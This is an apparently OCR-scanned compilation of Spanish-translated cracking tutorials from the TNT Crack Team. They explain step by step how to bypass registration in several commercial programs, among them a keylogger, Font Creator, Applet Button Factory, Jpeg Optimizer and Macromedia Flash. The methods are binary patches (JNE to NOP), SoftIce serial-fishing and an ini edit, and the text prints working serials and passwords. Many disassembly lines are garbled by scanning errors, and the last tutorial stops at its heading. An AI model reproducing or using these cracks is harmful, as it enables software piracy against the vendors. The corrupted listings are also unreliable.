Nota: este tutorial está creado solo con fines educacionales. El autor no se responsabiliza de el uso que le puedan dar. 


Agradecimientos | 


saludos a todos los amigos de TNT CRACK TEAM 2000 


S1 gustas mandar tus tutoriales a Tutoriales 2000, para que 
aparescan en la nueva versión !!! Mandalos y que se vea lo que 
aprendes !!!! 


profesor_x hotmail.com 


007 STARR v1.22 


Un Parche Tipico 


Resolución deseada 1024 X 768 


by FaT[BiT] 1 TNT! 


Cracking para Principiantes 


Información del Programa 


Nombre : starremd.exe 


Tipo : Key Logger 


Url : http://www.iopus.com 


Medida : 381KB 


Herramientas : 


W32Dasm v8.93 


Hiew v6.16 
Facil ( X ) Medio ( ) Duro ( ) Profesional ( ) 


007 STARR v1.22 
Crackeado y Escrito por : FaT[B1T] A TNT! 
Tutorial No. : 4 


Introducción | 


Traducido por !! 


pROFeSoR X !!! 


En un intento de poner a disposicion de todos, los tutoriales del Amigo FaT[B1T] los cuales vale la pena leerlos. 


ESTE TUTORIAL ES PARA NOVATOS 
Como mi amigo Sir dReAm Dice " situ eres una avanzado cracker y quieres leer este tutorial, tu realmente estas perdiendo el 
tiempo " 


Protección | 


Este programa necesita un Codigo de Registro!! , para ser una version completa!! . Ahora en este tutorial nosotros parcharemos 
el archivo exe para que acepte cualquier serial que tu ingreses, entonces manos a la obra', este es un corto y facil tutorial !!! 


Crackeando | 


ejecuta el programa y trata de entrar cualquier Numero de Serie o Codigo de Regisro, da click en el boton de register y *boom* 
, sale un feo mensaje de error, ya sbes que hacer, si copy el archivo starremd.exe al directorio del win32dasm. y desensambla 
el archivo, despues que el win32dasm termine, da click el el Boton de STRING REFERENCES y hechale un vistazo y busca 
el Mensaje de Error, pero espera !!! vez lo que yo veo !! , Hay un mensaje de Gracias tambien, hechale un viztazo 7 lineas 
abajo de nuestro Mensaje de Error , este dice "Your 007 STARR registration was..” , da click en este, y sube unas lineas y tu 
podras ver este codigo : 


:0040844F FEFD7 call edi 

:00408451 85C0 test eax, eax 

:00408453 7571 jne 004084C6<-- THE GOOD BOY JUMP :)> 
:00408455 6A%0 push 00000040 

:00408457 53 push ebx 


* Possible StringData Ref from Data Ob] -"Your 007 STARR registration was " 
"successful - Thank you ! " 


:00408458 68F0F94200 push 0042F9F0O 
:0040845D 8BCE mov ecx, esi 
:0040845F E8FA190100 call 00419E5E 


* Possible StringData Ref from Data Obj -"REGISTERED VERSION" 


:00408464 684CD44200 push 0042D44C 
:00408469 8D8E54010000 lea ecx, dword ptr [esi+00000154] 
Ahora.. tengo que explicarte como funciona!!!!, si nosotros seguimos el salto a la dirección 00408453 este te llevara a el 


Mensaje de Errorit, por lotanto si lo parchamos !!! entonces este no saltara!!! y el programa STARR estará REGISTRADO . 


El Parche | 


O.k ejecuta el Hiew y carga el archivo starremd.exe , y ve a la dirección 00408453, ahora tenemos dos formas de parchar el 
codigo la primera es cambiar el JNE por JE, y la segunda es cambiarlo por un NOP . en la primera forma si nosotros 


cambiamos el salto JNE por JE, entonces STARR no tomará el Codigo de Registro correcto, por lotanto usre la segunda 
forma. 


Ahora vamos a cambiar ese salto por un NOP , entonces nosotros tenemos la dirección 00408453 , presiona F3 , y cambialo 
por 9090 , despues presiona F9 para guardar los cambios y sal del Hiew, ahora copy el archivo a su directorio original y 
ejecutalo, kool !!! , ve a la ventana de registro e inserta cualquier Numero de Registro y yes yes yes yes !!!! 


007 STARR is REGISTERED 


| Palabras Finales | 


O.k aqui lo tienes, espero que hayas disfrutado este tutorial tanto como yo lo disfrute al escribirlo, bueno amigos los veo hasta 
el proximo tutorial !! 


FaT[BiT]_FaTsO Agradecimientos : 


tKC ( realmente me enseñantes a usar la luz !!! muchas gracias ) 
LwW2000 ( Gracias !!! i Ahora si uso mi cerebro !!) 
Xasx (Hola !! el Mejor fundador del grupo) 
Sir_dReAm ( Simpatico CrackME !!! ) 
Bonez (Gracias por el Soporte !! ) 


y atodos los Miembros TNT CRAC K TEAM 


cya FaT[BiT]A TNT! 


The Font Creator Program v2.2 


DAME TU CRACK ... HAZLO REALIDAD ... O OLVIDATE DE ESO !!! 
Part (2) 


RESOLUCION OPTIMA 1024 X 768 


by FaT[BiT]A1 TNT! 


Cracking para Principiantes 


Información del Programa 


Nombre del Programa : fcp2.exe 


Tipo del Programa : Font Util. 


Url : http://www.high-logic.com 


Tamaño : 1.13MB 


Herramientas : 


Softlce v4.05 


W32Dasm v8.93 


RISC's Process Patcher v1.5 
Facil ( ) Medio ( X ) Dificil ( ) Profesional (>) 


THE FONT CREATOR PROGRAM v2.2 
Crackeado y Escrito por : FaT[B1T] A TNT! 
Tutorial No. : 11 


Dedicado a : | 


A MIS MEJORES AMIGOS !! 
-- [XasX] -- 


-- Sir dReAm -- 
-- MazM -- 
ae Jorge q 


Intoducción € Tipo de Protección | 


HOLA TODOS !! 
TRADUCIDO POR 
Pr fEsOr X / TnT !!! 


NOTA: DEL TRADUCTOR: esta traducción es un intento por poner a su disposición algunos tutoriales de crackers en 
ingles, si gustas que tus tutoriales aparescan en esta compilación , !! vamos mandenmelos !!! y compartan sus conocimentos, 
tus tutoriales seran bienvenidos ya que son la parte importante de este proyecto. 


Hey ! estoy de regreso con la parte 2 de este tutorial , para todos los que leyeron la parte 1, gracias !! y ellos saben de que trata 
este tutorial, pero quienes no han leido la parte 1, para esos deberan leer la parte 1....... 


o.k nuestro objetivo es el programa the font creator program , lo usual, este programa necesita un Nombre, un Password y un 
Nombre de la Empresa ( pero este es opcional), que haremos ahora , primero buscaremos un numero de serie para tu Nombre , 
despues parcharemos el archivo ejecutable para volver el programa en un Generador de LLaves o (keyMaker)....... 


entoces Empecemos !!!! 


The Essay | 


O.k ... Vamos a Buscar Nuestro Password !!! 


o.k instalamos el the font creator program , ejecutalo , lo primero que aparecera sera una Nag Screen , pero el boton de inicio 
esta todavia desabilitado y el boton de registro esta habilitado, demos click en el boton Register !! , 0.k ... un Nombre, un 
Password y un Nombre de empresa se pide insertar, en mi caso pondre: 


Name : FaT[BiT]1 TNT! 
Company : TNTICRACK!'TEAM! 
Registration Password : 010 010 010 010 


ahora damos click en el boton de Registro, y obtenemos el siguiente mensaje: 
Registation Falid : Invalid Password 


Ahora.... recordemos este mensaje por que lo necesitaremos dentro de un rato!! , copia el archivo fep2.exe a la carpeta del 
win32dasm y desensamblado!! , una vez desensamblado busca el mensaje de error, da doble click en este y baja unas cuantas 
lineas y tu podras ver algo como esto : 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


|:004B7557(C)<-- we go here !!!> 

:004B75AF 6A00 push 00000000 

:004B75B1 668B0D24764B00 mov CX, word ptr [004B7624] 
:004B75B8 B201 mov dl, 01 


* Possible StringData Ref from Code Ob] -"Registration failed: Invalid Password" 


:004B75BA B86C764B00 mov eax, 004B766C 
:004B75BF E83C23FAFF call 00459900 
:004B75C4 8B45FC mov eaX, dword ptr [ebp-04] 


como siempre esta parte del codigo a sido llamada por otra instrucción, y la dirección es 004B7557 entonces vamos y damos 
click en el boton de "searchifind text'' e ingresa esa Dirección de memoria, cuando este allí sube un poco!! y veras algo como 
esto: 


:004B7546 8B45F8 mov eax, dword ptr [ebp-08] 
:004B7549 E8A614F5FF call 004089F4 

:004B754E 8B55D4 mov edx, dword ptr [ebp-2C] 
:004B7551 58 pop eax 

:004B7552 E89DCBF4FF call 004040F4 

:004B7557 7556 jne 004B75AF <-- BadBoy Jump> 
:004B7559 8D55DO lea edx, dword ptr [ebp-30] 
:004B755C 8B45FC mov eaXx, dword ptr [ebp-04] 
:004B7594 B202 mov dl, 02 


* Possible StringData Ref from Code Ob] -—"Thank you for registering the " 
-"Font Creator Program." 


:004B7596 B830764B00 mov eax, 004B7630 
:004B759B E86023FAEFF call 00459900 


* Possible StringData Ref from Code Ob] -"Registration failed: Invalid Password" 


:004B75BA B86C764B00 mov eax, 004B766C 
:004B75BF E83C23FAFF call 00459900 
:004B75C4 8B45FC mov eax, dword ptr [ebp-04] 


para mi creo que esta claro, y para ti esta claro? , o.k dejame explicarte !! , Ahora en la Dirección 004B7557 esta nuestro salto, 
Ahora nosotros podemos parchar este salto.... pero antes, nosotros no sabemos todavia si nuestro Numero de serie será puesto 
en el registro, por que el programa no lo checa cada vez que este inicia, y si lo hace, nosotros tenemos que encontrar donde este 
es checado, entonces parchamos, debes de poner NOP.... y ve al programa e inserta cualquier serial y este te dice "thanx for 
registring".. pero ahora sal del programa y ejecuta de nuevo.... hmmm !!! la pantalla de no registrado sigue ahi, entonces 
olvidemos este salto.. y piensa en algo mas... bueno nos vemos. mañana tengo que ir a la escuela... seguiremos mañana que 
regrese..... cya 


o.k ya regrese de la escuela ahora continuemos con esto ... ahora nosotros no queremos parchar el codigo, nosotros queremos 
encontrar el serial para nuestro nombre, yo creo que es lo mejor, hechemosle un vistazo al codigo que esta antes del salto, se 
que es dificil entender el codigo... :P .... 


:004B7546 8B45F8 mov eaxX, dword ptr [ebp-08] 
:004B7549 E8A614F5FF call 004089F4 

:004B754E 8B55D4 mov edx, dword ptr [ebp-2C] 
:004B7551 58 pop eax <-- set a bpx here> 
:004B7552 E89DCBF4FF call 004040F4 

:004B7557 7556 jne 004B75AF <-- BadBoy Jump> 
:004B7559 8D55DO lea edx, dword ptr [ebp-30] 
:004B755C 8B45FC mov eax, dword ptr [ebp-04] 


o.k ... ahora creo que estaras desconcertado y preguntandote por que pusimos un break Point 004B75351 te dire por que, todas 
las instrucciones CALL necesitan de un parametro para poder trabajar con el, y sin embargo el Salto despues de la CALL es 
nuestro salto que buscamos, de seguro entonces esta CAll es la que checa nuestro serial, seguro !! entonces pongamos un Break 
Point en esa para ver que es lo que esta dentro de eax , te preguntaras como pongo un Break Point en esta dirección pues como 
siempre te digo es facil y creo que a estas alturas ya sabes poner un Break Point ok!!..... 


ahora ejecuta el programa Font Creator y da click en Register, entra tu informacion, ahora antes de dar click en el boton de 
registrar, presiona [Ctrl]+d para entrar al Soft Ice y poner el Break Point : 


bpx hmemcpy 


despues presiona FS para salir del softice, ahora da click en el boton de registrar e inmediatamente entraras a el Softlce, 
despues presiona F11 solo una vez, presiona F12 7 veces , ahora borra todos los Break Points bc * , pon un Break Point en 
004B7551, presiona FS , el Softlce Rompera otra vez presiona F10 una sola vez, entonces escribe d eax para ver el contenido y 
ahi lo tienes el valor que se muestra tiene apariencia de numero de serie, en mi caso fue : 


H4A674561980 


escribe este numero en un papel, despues borra todos los Break POints que pusimos y tratamos de insertar ese serial que 
encontramos , y !!! si el Font Creator Program esta Registrado ..... 


para esos que estan leyendo este tutorial para saber como encontrar un numero de serie para su nombre me gustaria decirles 
muchas gracias por leer mi tutorial, pero a los que quieren saber mas sobre como podemos parchar el ejcutable del Font 
Creator para volverlo un KEYGEN ....... 


FaT[BiT]_FaTSO Felicitaciones : 


tKC ( me enseñaste la verdadera LUZ !!! muchas gracias ) 
Lw2000 (Gracias !!! ahora ya uso mi cerebro !!) 
Xasx (Hola !! este tutorial es dedicado a ti !!) 
Sir_dReAm ( espero te guste este tutorial !!! ) 
MazM ( Donde Diablos estas !! ) 
BillGamEZ ( Gracias !! eres un verdadero amigo !! ) 
Bonez (Gracias por tu Ayuda !! ) 


yawcosiorienses IN TICRACK!ITEAM! 


cya FaT[BiT]A TNT! 


Applet Button Factory v5.0 


Una Protección Estupida 


Resolución Optima1024 X 768 


by FaT[BiT]A1 TNT! 


Cracking para Principiantes 


Información del Programa 


Nombre : Applet button Factory.exe 


Tipo : Web Design Tool 


URL : http://www. Coffecup.com 


Tamaño : 1.59MB 


Herramientas : 


W32Dasm v8.93 


Hiew v6.16 
Facil ( X ) Medio ( ) Duro ( ) Profesional ( ) 


Applet Button Factory v5.0 
Crackeado y Escrito por : FaT[B1T] A TNT! 
Tutorial No. : 5 


Introducción | 


TRADUCIDO AL ESPAÑOL POR !! 
PrEfEsOr X !!! / TnT 


NOTA: DEL TRADUCTOR: esta traducción es un intento por poner a su disposición algunos tutoriales de crackers en 
ingles, si gustas que tus tutoriales aparescan en esta compilación , !! vamos mandenmelos !!! y compartan sus 
conocimentos, tus tutoriales seran bienvenidos ya que son la parte importante de este proyecto. 


Protection | 


O.k Este programa necesita un Nombre y un Numero de Serie para registrarlo !! en este tutorial nosotros trataremos de 
encontrar o parchar el programa para que acepte cualquier Nombre y Numerio de Serie !! , pero por lo que pude ver y ustedes 
veran en unos momentos es el programa con la protección mas estupida que he encontrado !!!, lean este tutorial y veran por 
que lo digo !!! 


Crackeando | 


O.k sabes que hacer ? , si ejecuta el programa!! , da click en Register, y entra cualquier Nombre y Numero de serie, en mi caso 
pondre : 


NAME : FaT[BiT] 
Password : TNT!CRACK!'TEAM! 


y *boom* ahi esta el mensaje de error, ahora sabes que hacer, copia el archivo exe a el subdirectorio donde tienes instalado el 
w32dams y desensamblalo. este ya finalizo tan rapido !!! wow !!! , en mi maquina tomo un poco de tiempo, busca el mensaje 
de error y si lo encuentras da doble click en el , kool !!! y sube unas cuantas lineas hasta la parte del codigo donde veas lo 
siguiente : 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 


|:0046F4DC(C), :0046F504(C) <-- nice !!! ha !!! Let's go there> 

* Possible StringData Ref from Code Ob] -"Incorrect username and password." 
:0046F592 B890F64600 mov eax, 0046F690 

:0046F597 E81839FEFF call 00452EB4 


o.k como puedes ver dos saltos condicionales te mandan a esta parte del codigo que les parece si vamos a la primera dirección 
0046F4DC , entonces ve y da click en el boton de Buscar y escribe la Dirección y llegaras a esta parte del codigo: : 


* Possible StringData Ref from Code Obj -"l2aew" 


:0046F4D0 BACOF54600 mov edx, 0046F5C0 

:0046F4D5 E8S0699F9FE call 00408DE0 

:0046F4DA 85C0 test eax, eax 

:0046F4DC 0F85B0000000 jne 0046F592 <-- Jump to error message> 
:0046F4E2 8D55FC lea edx, dword ptr [ebp-04] 

:0046F4E5 8B8318030000 mov eax, dword ptr [ebx+00000318] 
:0046F4EB E86017FCFF call 00430C50 

:0046F4F0 8B45FC mov eax, dword ptr [ebp-04] 

:0046F4F3 E8784AF9FF call 00403F70 


* Possible StringData Ref from Code Ob] -"938f5" 


:0046F4F8 BAC8F54600 mov edx, 0046F5C8 
:0046F4FD E8DE98F9FF call 00408DE0 
:0046F502 85C0 test eax, eax 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


|:0046F49D(C) 

:0046F504 0F8588000000 jne 0046F592 <-- where have i seen this address before ??> 

:0046F50A A1686B4A00 mov eax, dword ptr [004A6B68] 

:0046F50F 8B00 mov eax, dword ptr [leax] 

Bueno ... hemos encontrado los dos saltos, y que , me podrias decir acerca de esta parte del codigo !!! , encontramos el primero 


en la dirección 0046F4DC por que nuestro Nombre no es igual a "12aew" , y no podemos ejecutar el siguiente salto ya que el 
primer salto nos manda al mensaje de error!!! hmmm !!! pero sí tu miras un poco abajo veras algo como esto : 


* Possible StringData Ref from Code Ob] -"Registration is complete. Thanks " 
"for purchasing the Button Factory! " 
-"Would you like to print the codes " 
"for future reference?" <-- our Thank you message !!!> 


por lo tanto este compara nuestro Nombre y Numero de Serie con : 


l2aew <-- if our user name is not like this jump to error message> 
9j8f5 <-- if our password is not like this jump to error message> 


hmm !! o.k que bueno !!! entonce ahora abre el Applet Button Factory y da click en Register e ingresa como Nombre 12aew y 
como Pasword 9j8f5 , da click en o.k yyyyyy !!! si si si si si !!! 


APPLET BUTTON FACTORY IS REGISTERED 


Palabras Finales | 


espero que hayas disfrutado este tutorial tanto como yo lo disfrute al escribirlo saludos y nos vemos en el siguiente tutorial, !!! 
FaT[BiT]_FaTSO GreetZ : 


tKC ( you really Showed us the LIGHT !!! thanx alot ) 
LW2000 (Thanx !!! i now use my brain !!) 
Xasx (Hola !! the Best founder ever) 


Sir_dReAm (Nice CrackME !!! >) 
Bonez (Thanx for the support !! ) 


sa INTICRACKITEAM Pb: 


cya FaT[BiT]A TNT! 


Jpeg Optimizer v3.10 


UN SERIAL DURO DE ENCONTRAR 


Resolución Optima 1024 X 768 


by FaT[BiT]A TNT! 
o CrackingparaPrincipiantes 


Información del Programa 


Nombre : jpegopt.exe 


Tipo : Image Util. 


URL : http://www.xat.com 


Tamaño : 401KB 


Herramientas : 


W32Dasm v8.93 


Any ASCII Table 
Facil ( ) Medio ( X ) Dificil ( ) Profesional (>) 


Jpeg Optimizer v3.10 
Cracked y escrito por : FaT[B1T] A TNT! 
Tutorial No. : 2 


Intoducción | 


TRADUCIDO AL ESPAÑOL POR !! 
ProfEsOr X !!! / TnT 


NOTA: DEL TRADUCTOR: esta traducción es un intento por poner a su disposición algunos tutoriales de crackers en 
ingles, Gracias a todos los que me han mandado sus tutoriales y sigan sigan mandando , que se vea lo que aprenden!!! y 
a compartir sus conocimentos. 


Protección | 


Este programa necesita un Numero de Serie para registrarte !! , pero el problema con el serial es que esta codificado, si tratas 
de encontrar el mensaje de error, te ayudare un poco diciendote que no esta en los strings no te preocupes !!!, y trataremos otra 
cosa diferente !!! 


Crackeando | 


Instala el jpeg optimizer y ejecutalo, y sale la ventana de UNREGISTERED , da click en helpWwegister y trata de meter 
cualquier codigo y *BOOM* , el mensaje de error aparece !! , ahora trata de desensamblar el ejecutable, copia el archivo 
jpegopt.exe a el subdirectorio del win32dasm. desensamblado. que chido ya finalizo, busca el String del mensaje de error pero 
no esta , bueno ahora busca el mensaje de UNREGISTERED , da click en el boton de SDR window buscalo, o.k lo 
encontraste, da doble click sobre este y te mandara a esta parte del codigo: 


* Possible StringData Ref from Data Ob] -" Unregistered" 

:00404885 BA07C74700 mov edx, 0047C707 

:0040488A 8D8568FEFEFFEF lea eax, dword ptr [ebp+FEFFFFF6S] 
:00404890 E83F790400 call 0044C1D4 

:00404895 FF8548FFEFEF inc dword ptr [ebp+FEFEFFFF48] 
:0040489B 33C0 xor eax, eax 

:0040489D 898564FFFFFE mov dword ptr [ebp+FFFFFF64], eax 
:004048A3 8D9568FEFEFFEF lea edx, dword ptr [ebp+FEFFFFF6S] 
:004048A9 FF8548FFFFEE inc dword ptr [ebp+FEFFFFF48] 
:004048AF 8D8D64FEFEFFEF lea ecx, dword ptr [ebp+FEFFFFF64] 


Bueno... ahora busquemos algo interesante, como una CALL o Un salto, sube un poco hasta que veas el siguiente codigo : 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0040483E (U) 


:00404845 51 push ecx 

:00404846 E899590200 call 0042A1E4 <-- a call> 

:0040484B 59 pop ecx 

:0040484C 84C0 test al, al <-- a test for the result of the call> 
:0040484E 0F85EC010000 jne 00404A40 <-- jump if we pass the text> 


:00404854 66C7853CFFFFFFAOO1 mov word ptr [ebp+FEFFFFF3C], 01A0 


bueno.... (por que escogimos esta CALL ?), Hmm.. buena pregunta, pues muy facil, esta es la primera llamada antes del String 
UNREGISTERED y como pueden ver hay otra CALL antes pero esta la checaremos mas tarde, dentro de un rato veremos que hay 
dentro de ese CALL, posiciona la barra verde en el CALL y presiona el boton llamado CALL y tu podras ver algo como esto : 


* Referenced by a CALL at Addresses: 
1:00404846 , :00429651 <-- This Code is called Twice> 


:0042A1E4 55 push ebp 

:0042A1E5 8BEC mov ebp, esp 

:0042A1E7 83C4F4 add esp, FFEFFFFEF4 

:0042A1EA 53 push ebx 

:0042A1EB 8B4508 mov eaX, dword ptr [ebp+08] <-- put serial in eax> 
:0042A1EE 8D5DF4 lea ebx, dword ptr [ebp-0C] <-- duplicate the serial> 
:0042A1F1 8A10 mov dl, byte ptr [eax] <-- start of the duplication> 
:0042A1F3 8813 mov byte ptr [ebx], dl 

:0042A1F5 8A4801 mov cl, byte ptr [eax+01 

:0042A1F8 884B01 mov byte ptr [ebx+01], cl 

:0042A1FB 8A5002 mov dl, byte ptr [eax+02 

:0042A1FE 885302 mov byte ptr [ebx+02], dl 

:0042A201 8A4803 mov cl, byte ptr [eax+03 

:0042A204 884B03 mov byte ptr [ebx+03], cl 

:0042A207 8A5004 mov dl, byte ptr [eax+04 

:0042A20A 885304 mov byte ptr [ebx+04], dl 

:0042A20D 8A4805 mov cl, byte ptr [eax+05 

:0042A210 884B05 mov byte ptr [ebx+05], cl 

:0042A213 8A5006 mov dl, byte ptr [eax+06 

:0042A216 885306 mov byte ptr [ebx+06], dl 

:0042A219 8A4807 mov cl, byte ptr [eax+07 

0042A21C 884B07 mov byte ptr [ebx+07], cl 

0042A21F 8A4008 mov al, byte ptr [eax+08 

0042A222 884308 mov byte ptr [ebx+08], al 

0042A225 C6430900 mov [ebx+09], 00 <-- End of the duplication> 

00424229 OFBEO3 movsx eax, byte ptr [ebx] <-- check for our serial> 
0042A22C 50 push eax 

0042A22D E8128A0400 call 00472C44 <-- check if fisrt char of our code is a letter> 
0042A232 59 pop ecx 

0042A233 83F850 cmp eax, 00000050 <-- first char should be> 

0042A236 7559 jne 0042A291 <-- if not equal to ( P ) then unregged> 
0042A238 OFBE5301 movsx edx, byte ptr [ebx+01] 

0042A23C 52 push edx 

0042A23D E8028A0400 call 00472044 <-- checks if 2nd char is a letter> 
0042A242 59 pop ecx 

0042A243 83F847 cmp eax, 00000047 <-- 2nd char should be> 

0042A246 7549 jne 0042A291 <-- if not equal to ( G ) then unregged> 
0042A248 OFBE4B02 mOVsxX ecx, byte ptr lebx+02 

:0042A24C 83F92D cmp ecx, 0000002D <-- 3rd char should be> 

:0042A24F “7540 jne 0042A291 <-- if not equal to ( ) then unregged> 
:0042A251 0FBE4303 movsx eax, byte ptr [ebx+03 

0042A255 83F834 cmp eax, 00000034 <-- 4th char should be> 

0042A258 7537 jne 0042A291 <-- if not equal to ( 4 ) then unregged> 
0042A25A OFBE5304 movsx edx, byte ptr lebx+04 

0042A25E 83FA36 cmp edx, 00000036 <-- 5th char should be> 

0042A261 752E jne 0042A291 <-- if not equal to ( 6 ) then unregged> 
00424263 OFBE4BO5 movsx ecx, byte ptr [ebx+05 

0042A267 83F936 cmp ecx, 00000036 <-- 6th char should be> 

0042A26A 7525 jne 0042A291 <-- if not equal to ( 6 ) then unregged> 
0042A26C 0OFBE4306 movsx eax, byte ptr [ebx+06 

0042A270 83F837 cmp eax, 00000037 <-- Tth char should be> 

0042A273 “751€ jne 0042A291 <-- if not equal to ( 7 ) then unregged> 
00424275 OFBE5307 movsx edx, byte ptr [ebx+07 

0042A279 83FA32 cmp edx, 00000032 <-- 8th char should be> 

0042A27C 7513 jne 0042A291 <-- if not equal to ( 2 ) then unregged> 
0042A27E C705F49F48001443FC69 mov dword ptr [00489FF4], 69FC4314 

0042A288 E8DFA8FDFF call 00404B6C 

0042A28D BO0O1L mov al, 01 <-- Register Success !!!> 


:0042A28F EB1B ¿mp 0042A2AC 


chido !!! .... creo que hemos encontrado nuestro codigo, que piensas tu ? 
dejenme explicarles : 


es tiempo de usar nuestra tabla ASCII, (y por que ? ) , por que es de 8 caracteres de longitud, el primero y segundo caracter son 
letras, el tercero es una dash - , y del cuarto al octavo caracter son numeros, si le hechas un vistazo a las direcciones siguientes : 
0042A233,0042A243, 42A2A24C, 0042A255, 0042A25E, 0042A267, 0042A270 y 0042A279 , podremos ver que los registros EAX, 
EDX, y ECX son comparados con lo siguiente : 


Nota : estos son numeros hexadecimales 
hex : 50 47 2D 34 36 36 37 32 
Dec:PG - 4 6 6 7 2 <><--- *boom* our serial> 


por lo tanto aqui tienes tu serial, ahora todo lo que tenemos que hacer es insertar ese codigo yyyyyy!!!! kool !!! Jpeg Optimizer is 
REGISTERED. 


EL Parche | 


No Necesario! 


Palabras Finales | 


ahi lo tienes, espero que hayas aprenddo algo de este tutorial, como tambien que disfrutáras con este, chao y nos vemos en el 
proximo tutorial!!! 


FaT[BiT]_FaTSsO Felicitaciones : 
tKC (me enseñaste la verdadera LUZ !!! muchas gracias ) 
LwW2000 ( Gracias !!! ahora ya uso mi cerebro !!) 
Xasx (Hola !! este tutorial es dedicado a ti !!) 
Sir_dReAm ( espero te guste este tutorial !!! ) 
MazM ( Donde Diablos estas !! ) 
BillGamEZ ( Gracias !! eres un verdadero amigo !! ) 


Bonez (Gracias por tu Ayuda !! ) 


y atodos los Miembros de TN TICRACKITEAM! 


cya FaT[BiT] 1 TNT! 


Como Crackear Macromedia Software 


karlitoxZ este tutorial esta dedicado a ti :,: 


RESOLUCION OPTIMA 1024 X 768 


by FaT[BiT] 1 TNT! 


Cracking para Principiantes 


Información del Programa 
Nombre del Programa :Macromedia software 
Tipo del Programa : Macromedia Software 


Url : http://www. macromedia.com 


Tamaño : n/a 


Herramientas : Softlce v4.01 *only* (or 3.x will do!) 


Facil ( ) Medio ( X ) Dificil ( ) Profesional ( ) 


Crackeado y Escrito por : FaT[B1T] A TNT! 
Tutorial No. : 4 


Dedicado a : | 


A MIS MEJORES AMIGOS !! 
-- [XasX] -- 
-- Sir dReAm -- 
-- MazM -- 
en Jorge =n 


Intoducción € Tipo de Protección | 


HOLA TODOS !! 


TRADUCIDO POR 


Pr fEsOr X / TnT !!! 


NOTA: DEL TRADUCTOR: esta traducción es un intento por poner a su disposición algunos tutoriales de crackers en ingles, 
Gracias a todos los que me han mandado sus tutoriales y sigan sigan mandando , que se vea lo que aprenden!!! y a compartir 
sus conocimentos. 


Software 


Norton Antivirus v5.0 trial http://www.symantec.com 


Norton Uninstall Delux v1.01 trial http://www.symantec.com 


Macromedia Fireworks v1.0 trial http://www.macromedia.com 


Macromedia Fireworks v2.0 trial http://www.macromedia.com 


Macromedia Flash v3.0 trial http://www.macromedia.com 


Macromedia Flash v4.0 trial http://www.macromedia.com 


Macromedia Dreamweaver v2.0 trial http://www.macromedia.com 


y para este tutorial usaremos el programa 
MACROMEDIA FLASH v3.0_ 


1) instala el Macromedia Flash v 3.0 y ejecutalo !!!! 

2) lo primero que veras sera una ventana (ohhh !!!) !!! con 3 botones (buy now ), (try) y (cancel) 
<--- hehehehe 

3) 0.k da click en (buy now) , y veras un formulario el cual tienes que rellenar (carajos !) 

o.k busca un archivo llamado rsagent.ini y abrelo !!! 


4) en el archivo rsagent trata de encontrar algo como esto : 


mailStat-391842=0 <-- cambia el O por 1y graba el archivo 


recuerda si encuentras otra linea con estos datos tambien cambialos !!!! 


5) ejecuta el programa otra vez, y vuelve a dar click en (buy now) el programa te dira que insertes un numero de serie e 
inserta cualquier numero como este: 


1001779729 <-- este es tu codigo personal 


6) [Ctrl+d] para entrar a el softice, y poner un break point 'bpx getdlgitemtexta' , despues presina FS para salir 


7) ahora inserta cualquier codigo en mi caso insertatre TNTICRACKS y da click en o.k 


8) entonces Softlce saltara , despues presiona F11 y podras ver lo siguiente : 


:10005602 mov edi,10030E40 


:10005607 or ecx,-01 


:1000560A xor eax,eax 


:1000560C REPNZ SCASB 


:1000560E not ecx 


:10005610 dec ecx 


:10005611 cmp ecx,0A <--- compara nuestro numero que insertamos con 10 


:10005614 jz 10005655 <--- si es igual entonces salta *debe de saltar* 


:10005616 lea edx,[esp+10] 


9) Nota: si falla el salto , no podras nunca encontrar el Serial 


10) da F10 hasta 1005611 , i.e aqui: 


:10005611 cmp ecx,0A 


:10005614 jz 10005655 


una vez aqui ponemos en el softice la instrucción '? ecx' esto te mostrara : 


" 0000000A 0000000010 "11) ahora despues de que salto tu debes de ber algo como esto : 


:10005655 mov edi, 1002B060 


:1000565A or ecx, -01 
:1000565D xor eax, eax 
:1000565F lea edx, [esp+0000010C] 
:10005666 REPNZ SCASB 
:10005668 not ecx 
:1000566A sub edi, ecx 
:1000566C mov eax, ecx 
12) ahora con F10 hasta que llegues a esta parte del codigo : 
:10005691 lea ecx, [esp+000000D8] 
:10005698 push ecx 
:10005699 push edx 
:1000569A push eax 
:1000569B call 1000B950 
:100056A0 add esp, OC 
:100056A3 lea ecx, [esp+000000D8] 
:100056AA push 10030E40 
:100056AF push ecx <----- aqui esta nuestro serial que buscamos 


despues pon la instrucción 'd ecx' y en la ventana de datos tu podras ver unos numeros que de seguro son el registro del 
pograma : YFYBKIKCSS <--koool !!! 


13) y ya al final quisiera decirte que este metodo tambien se puede usar con todos los programas que se nombran en el 


14) Finalmente quisiera dar las gracias a : 


y recuerden : mucho crackear te matara !!! 


FaT[BiT]_FaTSO Felicitaciones : 


tKC ( me enseñaste la verdadera LUZ !!! muchas gracias ) 
Lw2000 (Gracias !!! ahora ya uso mi cerebro !!) 
Xasx (Hola !! este tutorial es dedicado a ti !!) 
Sir_dReAm ( espero te guste este tutorial !!! ) 
MazM ( Donde Diablos estas !! ) 
BillGamEZ ( Gracias !! eres un verdadero amigo !! ) 
Bonez (Gracias por tu Ayuda !! ) 


yawcosiorienses IN TICRACK!ITEAM! 


cya FaT[BiT]A TNT! 


Window Blinds v1.01 


Pescando un Serial 


Resolución Deseada 1024 X 768 


by FaT[BiT]A1 TNT! 


Cracking para Principiantes 


Información 


Nombre : wblind.exe 


Tipo : Utileria de Desktop 


Url : http://www.stardock.com 


Tamaño : 1.37MB 


Herramientas : 


Softlce v4.05 
Facil ( X ) Medio ( ) Duro ( ) Profesional ( ) 


Windows Blinds v1.01 
Crackeado y Escrito por : FaT[B1T] A TNT! 
Tutorial No. : 8 


Introducción | 


TRADUCIDO POR !! 
PrEfESOr X / TnT Member !!! 


NOTA: DEL TRADUCTOR: esta traducción es un intento por poner a su disposición algunos tutoriales de crackers en ingles, 
Gracias a todos los que me han mandado sus tutoriales y sigan sigan mandando , que se vea lo que aprenden!!! y a compartir 
sus conocimentos. 


Protección | 


ESTE ES FACIL!! DIRIA QUE MUY FACIL! 


has deseado algo y esto se ha hecho realidad!!! , trataremos!!! pero cuidado con lo que deseas!!!, este es el mas facil crack en 
toda la historia !!! este me tomo cerca de 1 minuto o menos para encontrar el serial y registrar el programa!!! , otra vez como 
siempre este programa nos pide que insertemos un Nombre y un Numero de Serie para hacerlo tuyo!!! eso es todo!! manos a la 
obra!! 


Crackeando | 


